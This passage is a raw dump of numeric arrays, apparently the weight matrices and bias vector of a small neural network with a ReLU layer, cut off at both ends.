-0.1127, -0.0886], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00977, -0.3425, -0.0873, 0.0231, -0.323, -0.2986, 0.2019, -0.3538, 0.11566, 0.3442, -0.553, 0.322, -0.4197, 0.5225, 0.1874, -0.2727, 1.09, -0.264, 0.4702, 0.01923, 0.3606, 0.7676, 0.1015, -0.512, 0.987, 0.8843, -0.4712, -0.4373, -0.285, -0.2198, -0.3066, -0.1271, 0.4087, -0.002625, -0.2057, -0.0874, -0.2152, 0.04977, -0.0664, 0.4167, -0.03214, -0.0801, -0.1299, 0.2424, 0.0559, -0.4795, -0.2169, -0.0452, 0.445, 0.7754], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.538, 0.1525, -0.5186, 0.2666, -0.3362, 0.3113, 0.2737, 0.6343, 0.1637, -0.08813, 1.443, 0.4773, -0.2544, 0.4724, 0.73, 0.5054, 0.79, -0.6226, 0.288, -0.02206, 0.015526, -0.0968, -0.146, -0.6265, 1.82, 0.575, 0.07605, -0.03705, 0.7554, 0.2037, 1.083, 0.8667, 0.917, -0.02028, -0.0861, -0.5166, 0.2362, -0.4736, 0.03116, 0.689, -0.1543, -0.4019, -0.09735, -0.1156, 0.18, 0.4714, 0.3699, 0.008934, -0.2079, -0.5464], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1997, -0.04688, -0.2489, 0.0688, 0.10925, -0.04855, 0.229, 0.1417, -0.1578, -0.2673, 0.4111, -0.2435, -0.1368, -0.2277, -0.1094, -0.6006, 0.1001, -0.2083, 0.58, 0.04272, 0.1667, -0.2256, -0.03842, 0.0518, 0.2362, 0.287, -0.865, -0.3315, 0.05322, -0.11676, -0.1357, 0.2688, 0.2808, 0.0476, 0.351, 0.1047, 0.1698, 0.1582, 0.11786, 0.0739, 0.12085, 0.00574, -0.1211, -1.42, 0.3257, -0.089, 0.00823, -0.01738, -0.2898, 0.0416], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02747, 0.2125, 0.2627, 0.0758, 0.1566, 0.05127, -0.02359, 0.2822, 0.4006, 1.057, -0.0701, -0.1975, 0.02153, -0.3516, 0.1366, -0.2954, 0.2092, -0.06323, -1.359, 0.02759, -0.3235, 0.0317, -0.029, 0.1547, -1.02, 0.6333, -0.02693, -0.5273, 0.0591, 0.0387, -0.1816, -0.5195, 0.3723, -0.0967, 0.06143, 0.3228, 0.1864, -0.0171, -0.03577, 0.3564, -0.317, -0.2493, 0.0663, -0.1434, 0.563, -0.09906, -0.1572, -0.0412, 0.1709, 0.2756], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3525, 0.1757, 0.4993, 0.06934, 0.1401, -0.1562, 0.0642, -0.4229, 0.1716, 0.712, -0.4097, 1.329, 0.1285, 0.1747, 0.04492, 0.0969, -0.314, -0.06, 0.0913, -0.02959, 0.11597, 0.2036, -0.06232, 0.0947, -0.3784, 0.432, -0.1227, 0.6333, 0.9214, -0.02382, 0.3293, -0.2274, -0.251, -0.10767, 0.0982, -0.302, -0.12427, 0.2245, -0.2001, -0.2363, 0.0684, -0.2783, -0.06323, -0.0602, 0.1677, -0.624, 0.08746, 0.01219, -0.05917, -0.8267], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4746, 0.1754, 0.2246, -0.05347, -0.06476, 0.4863, -0.01134, -0.00824, 0.2703, -0.7524, 0.03738, -3.799, -0.0753, -0.725, 0.009636, 0.614, -0.556, 0.904, -0.2457, -0.0013275, -0.1957, 0.1443, -0.004253, 0.1026, -0.628, -0.974, -0.11395, -0.1448, -0.462, 0.2305, 0.03537, -0.601, -0.2147, -0.05203, -0.2954, 0.4612, 0.05847, 0.1081, -0.2239, 0.4592, -0.3943, -0.0593, 0.2422, -0.2463, 0.615, 0.04807, 0.0331, -0.0177, 0.1993, -0.01988], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.379, 0.1195, 0.76, 0.4734, 0.3271, 0.06027, 0.4653, -0.04776, -1.106, -0.841, 0.9966, -1.371, 0.2487, 0.1377, -0.02856, 0.2053, -0.8267, 0.5386, 0.2421, -0.01576, 0.391, -0.572, 0.2197, 0.2986, -1.719, -0.437, 0.3916, 0.9927, 0.379, 0.519, -1.547, -0.361, -0.758, -0.386, -0.001499, -1.139, 0.03104, 0.09546, -0.343, 0.197, 0.1729, -0.0838, 0.1746, -0.9014, -0.00675, -1.034, 0.3418, 0.02974, -0.001272, -2.395], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.602, 0.3403, -0.282, 0.10974, 0.1942, 0.1476, -0.8247, -0.000938, 0.0117, -0.5283, 0.8545, -0.1454, -0.2358, -0.0986, 0.02512, 0.6865, -0.51, 0.4597, 0.0916, 0.003819, 0.07513, -0.374, 0.362, 0.3418, -0.611, -0.4448, 0.46, -0.07886, 0.0582, -0.10236, 0.2625, 0.4243, 0.06366, 0.002718, 0.1301, -0.1838, 0.07196, 0.4587, -0.5815, -0.2438, 0.2247, -0.2432, 0.4858, -0.744, -0.09125, -0.2954, 0.3967, 0.006012, 0.595, 0.1843], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7485, -0.6367, -2.164, -0.2057, -0.781, -1.208, 0.6396, 0.6274, -0.02414, -1.286, -0.4045, -0.1278, -0.4243, 1.438, -0.8857, 0.544, 0.5415, -1.059, -0.653, -0.04178, 0.3242, -1.362, -0.575, -8.53, 0.749, 0.788, 1.4375, 0.1089, -0.2059, 0.1774, 0.8447, -0.3213, 1.521, 0.5254, -0.293, -0.566, -0.7427, -0.2068, -0.298, -0.5093, -14.16, 0.22, -0.874, -0.3728, 0.03705, 1.06, 0.1508, 0.03223, -0.06824, -0.2966], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12476, -0.163, 0.1705, 0.3289, 0.06696, 0.1566, -0.2576, -0.0531, 0.352, 0.1692, -0.01826, 0.529, -0.07794, 0.1556, -0.05307, -0.1569, 0.07385, -0.3464, -0.03076, -0.01785, 0.11566, -0.2854, -0.0471, 0.07526, -0.1086, 0.01935, -0.01855, -0.313, 0.1238, 0.0696, 0.11694, 0.0988, 0.0791, 0.1852, -0.02994, 0.2966, 0.04187, -0.091, -0.09424, -0.06354, 0.0496, -0.1611, 0.05695, 0.289, -0.06934, 0.3865, 0.1052, 0.014435, 0.2075, -0.02724], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02248, 0.2352, -0.00244, 0.2354, -0.3127, 0.2169, -0.2119, 0.1438, 0.04535, 0.0775, 0.5337, 0.0782, -0.1276, -0.1117, 0.0442, -0.1998, 0.3875, 0.1714, -0.05396, -0.01167, 0.2168, 0.3362, -0.1912, -0.05646, -0.0918, -0.08716, -0.1917, -0.0875, -0.01956, -0.04547, 0.1537, 0.0835, 0.04355, 0.04987, 0.08466, -0.0676, 0.3164, -0.2717, 0.1643, 0.09546, -0.2312, -0.2979, -0.03708, -0.3408, 0.09534, 0.002558, -0.03912, -0.01036, -0.1727, -0.08765], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.658, -0.2686, -0.4158, -0.3857, -0.092, 0.349, -1.461, 0.937, -0.312, 1.932, -1.584, 0.461, 0.2266, -0.4387, 0.0652, -1.654, 1.668, -0.4883, -0.2207, 0.0494, -0.682, 1.436, -0.3184, -0.533, 0.922, 0.3425, -0.3687, 0.722, -0.17, -0.7104, 0.2319, -2.617, -0.1733, 0.1986, 0.951, 0.743, -0.04095, -1.717, -1.064, 0.11237, 0.846, -0.64, -0.391, 0.3164, 0.9727, -1.095, -0.6807, -0.02843, -1.464, 0.7686], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2373, -0.10114, 0.8896, -6.52, -1.659, -0.856, -0.3179, 1.531, -0.918, 2.707, -0.2646, 1.044, 0.527, 0.672, 1.237, 0.1913, -0.12115, -1.547, 0.3884, 0.02554, -0.7827, 3.898, 0.6875, -0.4553, -0.01776, 0.3499, 0.3186, -0.857, 0.503, 0.7427, -0.633, -0.949, -2.307, -0.815, 0.479, -0.356, -0.5435, 0.2225, -0.806, -0.3699, 0.6636, -0.09424, -0.1705, -1.996, -2.703, -0.03415, -0.876, -0.0316, -0.2157, -2.312], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05508, -0.02249, -0.0622, -0.1805, 0.01208, -0.00936, 0.05698, 0.2192, -0.003416, -0.01564, -0.05087, 0.2861, -0.06207, -0.1346, 0.1385, -0.1843, -0.1537, -0.1781, -0.2075, -0.0177, 0.0252, 0.2832, -0.1588, -0.0791, 0.269, 0.01198, -0.1447, -0.07635, 0.04367, -0.2134, -0.002476, 0.4565, 0.1895, -0.01569, -0.0295, -0.02344, -0.0999, 0.02493, 0.1653, 0.03625, 0.1279, -0.10284, -0.1719, -0.0592, -0.3647, 0.3645, -0.002584, -0.02701, -0.127, 0.0734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3254, 0.1431, 0.2793, -0.4358, 0.1587, -0.059, 0.576, -0.0932, -0.506, 0.2369, -0.6636, -0.3743, -0.0839, 0.1196, -0.1425, 0.2512, -0.1401, -0.1625, 0.3909, -0.0393, 0.001703, -0.2476, 0.1978, 0.1404, 0.011566, -0.3696, 0.08795, -0.02592, -0.674, -0.0861, -0.7104, 1.11, -0.07916, -0.0128, -0.2245, -0.327, -0.392, -0.5947, -0.002073, -0.4878, -0.2107, 0.0861, 0.0943, 0.343, 0.4392, -0.2257, 0.04446, -0.0193, 0.4524, 1.045], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6035, -0.05826, -0.11945, 0.348, -0.1643, 0.4336, -0.8745, -0.7314, -0.907, -1.237, 1.501, -2.738, -0.05664, 1.042, 0.5747, -0.0407, -1.209, 0.53, 1.648, -0.01718, -0.1473, 0.0718, -0.03008, 0.303, 0.9062, -3.557, -0.8105, -0.1498, -1.609, -0.707, 0.03397, 1.605, -0.5728, -0.3516, -0.001982, -0.316, 1.109, -0.8696, -0.355, -0.2347, 0.4866, 0.3684, 0.5083, 0.2722, -6.6, -0.2837, 0.4656, 0.02568, 0.2559, -0.34], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06235, -0.1771, -0.4048, 0.02953, -0.0704, 0.02348, -0.341, -0.07635, 0.03183, 0.0936, -0.09283, -0.03494, -0.1693, -0.0699, 0.4768, -0.0829, 0.2283, -0.03912, 0.1783, 0.002232, -0.258, 0.2986, 0.1572, -0.1565, 0.2795, 0.273, 0.06128, -0.215, -0.2106, 0.0834, 0.1835, -0.0362, 0.2245, 0.139, 0.0745, 0.289, -0.07654, 0.487, -0.06915, -0.2625, -0.2252, 0.1799, -0.1659, -0.1398, -0.3384, 0.3235, 0.1224, -0.02782, -0.08105, -0.2925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5083, -0.12427, -0.08673, 0.3545, -1.093, 0.0197, -0.1345, -0.501, -0.2151, 0.1227, -0.3162, -0.387, 0.1091, -0.2318, -1.024, 0.0752, 0.2524, -0.0811, 0.06, 0.02873, -0.0669, -0.3394, -0.02106, 0.2717, 0.0752, 0.03534, 0.344, -0.1808, -0.0716, 0.2385, 0.1613, -0.0657, -0.5767, -0.09656, -0.52, -0.09247, 0.4207, 0.0809, -0.2666, 0.02727, -0.2998, -0.4827, 0.02841, 0.1824, 0.4094, 0.2625, -0.335, 0.00815, -0.4446, -0.2969], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2822, -0.05695, 0.0528, 0.3826, 0.5264, -0.1553, -0.2025, 0.414, 0.1462, -0.01262, -1.091, -0.4712, -0.11237, 0.1321, 0.134, -0.413, 0.1216, 0.365, -0.2385, -0.04727, 0.4705, -0.1049, -0.028, -0.136, -0.1385, -0.4463, 0.2007, -0.4153, 0.12, -0.2404, -0.6367, -0.84, -0.7773, -0.5767, 0.1653, -0.281, 0.4275, -1.889, 0.0778, -0.01628, 0.1587, 0.373, -0.4363, 0.5674, 0.4893, -0.4214, -0.1373, 0.02211, 0.1333, -0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3662, -0.10394, -0.346, 0.52, -0.2303, 0.298, -0.6865, -0.4148, -0.2693, 0.3613, 1.407, -0.5664, -0.07275, 0.7666, -0.035, 0.322, 0.764, 0.72, -0.4507, 0.03035, 0.533, -0.501, -0.3574, -1.102, -0.00983, 0.3342, 0.3218, 0.536, -0.2595, -0.5293, -0.56, -0.02911, -0.338, -0.4553, -0.182, 0.04385, 0.787, -1.411, 0.10876, 1.212, -2.2, -0.2007, 0.523, -0.06168, 0.187, -0.08936, 0.5317, -0.04425, 0.2001, -0.5464], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5205, -0.1768, 0.2542, -0.3264, 0.247, 0.3013, -0.1458, -0.3745, 0.2025, -0.1724, -0.1683, -0.3633, 0.0628, 0.0953, 0.7373, -0.694, 0.2632, -0.02344, 0.1599, 0.02702, 0.2372, 0.545, -0.266, -0.3574, 0.00818, -0.314, -0.10315, -0.0811, -0.308, -0.3467, 0.6934, 0.698, -0.1545, 0.0876, -0.02422, 0.602, -0.589, 0.282, -0.08435, 0.282, -0.3281, -0.1265, 0.1881, -0.03674, -0.2374, 0.1641, -0.05115, -0.01817, -0.1824, 0.5356], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02794, -0.06107, -0.01014, -0.0553, 0.04044, -0.05737, 0.00621, -0.002224, 0.02385, -0.01482, 0.001553, -0.03674, 0.01628, 0.0212, 0.00491, 0.0047, 0.04245, -0.02415, -0.006554, 0.02823, -0.05463, -0.03186, -0.02824, -0.03244, 0.013, -0.02002, 0.01854, -0.01121, -0.03348, -0.01317, -0.01732, 0.01502, -0.03912, 0.01727, 0.00879, 0.0264, -0.00261, -0.01248, 0.01091, -0.05478, -0.05338, -0.0669, -0.03836, 0.02444, -0.003244, -0.007027, -0.04507, 0.0307, 0.010925, 0.02257], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1245, -0.1144, -0.2134, 1.413, -0.6733, -0.2333, 0.3706, -0.3145, 0.594, -0.2556, -0.3154, 0.316, -0.1747, -0.05594, -0.03595, 0.529, -0.0337, 0.5635, -0.1886, 0.03333, 0.01511, 0.00196, -0.0565, -0.2347, 0.704, 0.4321, 0.2157, 0.3103, -0.4512, -0.1528, 0.408, 0.8345, 0.3967, 0.106, -0.449, 0.386, -0.1864, -0.4941, 0.0412, 0.5435, -0.282, -0.2338, -0.1598, 0.3455, 0.6294, 0.09094, 0.263, -0.01405, 0.0704, 0.08704], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0863, 0.2147, -0.2051, -0.51, -0.283, -0.3354, -0.002817, -0.0388, 0.3606, -0.1611, 0.1615, 0.1688, -0.3867, 0.4895, -0.1437, -0.0548, -0.823, 0.04572, 0.338, -0.00916, -0.02457, 0.311, 0.1586, 0.0589, 0.02913, 0.649, -0.08923, -0.006878, -0.2166, -0.3594, -0.2041, 0.873, -0.1549, -0.2444, 0.0871, -0.252, 0.2416, -0.6367, -0.4192, -0.0852, -0.02736, -0.2454, 0.315, -0.3962, -0.1722, -0.705, 0.488, 0.02197, -0.0403, 0.199]]
[1.48416, -0.0392727, -0.0907838, -2.47397, -2.26864, 0.289911, 0.0849784, -0.0216935, -0.688173, -0.245358, -0.408883, 0.345316, -1.17538, -0.129693, -0.0153813, 2.30298, 0.472199, -0.466609, -1.12351, 0.495937, -0.570643, -0.788515, 1.01652, 0.462602, -1.62913, -0.584215, 0.124253, -0.0774607, 0.288896, -1.92722, -1.86128, 0.507499, 2.08643, -0.100975, 0.302989, -0.800885, -0.166501, 0.224915, -0.31377, -0.0885139, -0.0413228, -0.688478, 0.0999729, 0.235693, 0.200208, 0.185322, 0.213242, -0.0363364, 0.0762837, -0.216393, 1.484, -0.03928, -0.09076, -2.475, -2.27, 0.2898, 0.08496, -0.0217, -0.688, -0.2454, -0.409, 0.3452, -1.176, -0.1296, -0.01538, 2.303, 0.4722, -0.4666, -1.123, 0.4958, -0.571, -0.7886, 1.017, 0.4626, -1.629, -0.584, 0.12427, -0.07745, 0.2888, -1.927, -1.861, 0.5073, 2.086, -0.10095, 0.303, -0.801, -0.1665, 0.225, -0.3137, -0.0885, -0.04132, -0.6885, 0.1, 0.2357, 0.2002, 0.1853, 0.2133, -0.03635, 0.0763, -0.2164]
ReLU
[[-0.169473, -1.03007, 0.593824, -0.338295, 0.209267, 0.217493, 0.282646, 0.16408, 0.847151, -0.709383, 0.355731, 0.00851368, 0.230222, 0.61313, -0.00210447, -0.0725392, 0.129506, -0.163513, -0.0985782, -0.605079, -0.135279, -0.452584, 0.446829, -0.441123, -0.0297429, 0.203976, 0.0839317, -0.535231, 0.732104, -1.1308, -0.1063, 0.165051, -0.00495938, -0.205156, 0.0252767, -0.509672, -0.117627, -0.0121789, 0.0852722, -0.839977, 0.177017, 0.591938, -0.445001, 0.726944, 0.473024, -0.578123, 0.0935903, -0.0158796, 0.271254, 0.660591, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.143577, 0.157256, 2.10021, 0.291818, -0.646289, -0.204413, 1.70395, -0.0909241, 2.71345, -0.373817, 0.777598, -0.0737466, 0.347773, -0.278903, 0.0362949, -0.20527, -2.19531, -0.436689, 1.33267, 0.479349, -2.02983, -0.59832, -0.293505, -0.359685, -2.78916, -2.06597, -0.586336, -0.388229, -0.160516, -5.22225, -0.0544925, 0.0294967, -0.0245091, -0.917015, 0.531314, 0.631571, 2.12404, 0.776355, 0.336582, 0.899602, 1.06138, 1.10148, 1.5414, 2.05923, 1.53419, -0.175343, 0.0965602, -0.00813101, -0.193434, -0.996148, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00119997, -0.254742, 0.202776, -0.0314264, -0.140569, 0.490016, -0.11169, 0.516098, 0.163042, 0.316937, -0.210767, -0.157627, -0.094456, -0.340132, 0.031363, 0.044025, 0.0542488, 0.0655882, 0.414036, -0.171993, -0.124623, 0.0786032, -0.0973331, 0.061418, -0.182836, -0.258007, -0.0953505, -0.0712494, 0.275942, -5.66053, -2.60924, 0.0726355, -0.0692279, -0.102569, 0.115596, -0.212374, -0.366205, -0.00909374, -0.133603, -0.111884, 0.0470368, 0.223978, -0.13348, 0.156666, 0.400056, 0.0484032, -0.305145, 0.00205837, -0.194817, -0.719632, 0.0, 0.0, 0.0, 0.0, 